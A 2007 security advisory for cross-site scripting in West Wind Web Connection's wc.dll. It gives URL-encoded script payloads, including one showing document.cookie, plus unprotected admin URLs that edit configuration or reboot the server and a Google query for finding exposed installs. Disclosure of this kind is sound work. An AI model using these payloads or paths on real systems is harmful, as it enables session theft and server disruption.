|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Saturday, 15 December 2007 11:40 |
 [HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability
West Wind Web Connection is a tool for building Web applications using the Visual FoxPro environment but is also Vulnerable to Cross-Site scripting attacks. Admins need to password protect the application since its installed with out password on default. Also senatize the code to disallow xss attacks or javascript.
Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz
Risk: Medium
Class: Cross Site Scripting
Remote: YES
Local: Yes
Vendor: West Wind Technologies http://www.west-wind.com
Product Version: All Versions
* Attackers can exploit these issues via a web client.
Examples:
/wc.dll?=%22%3E%3Cscript%3Ealert("Hello");%3C/script%3E
/wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert("Hello");%3C/script%3E
/wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Remote Privileges Escalation: (Password Unprotected Application)
Log - /wc.dll?wwmaint~showlog
ISAPI Configuration - /wc.dll?_maintain~ShowStatus
DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog
Server Status - /wc.dll?wwMaint~ServerStatus
View of settings - /wc.dll?wwmaint~ShowStatus
Editing Config Files - /wc.dll?wwMaint~EditConfig
Reboot Machine - /wc.dll?wwMaint~RebootMachine
Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On
Web Connection Kill - /wc.dll?wwmaint~sessions~KILL
Google Search:
http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en
Only becoming a Ethical Hacker, you can stop a Hacker. Learn with out having
to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security
pack you will ever find on the net!
|
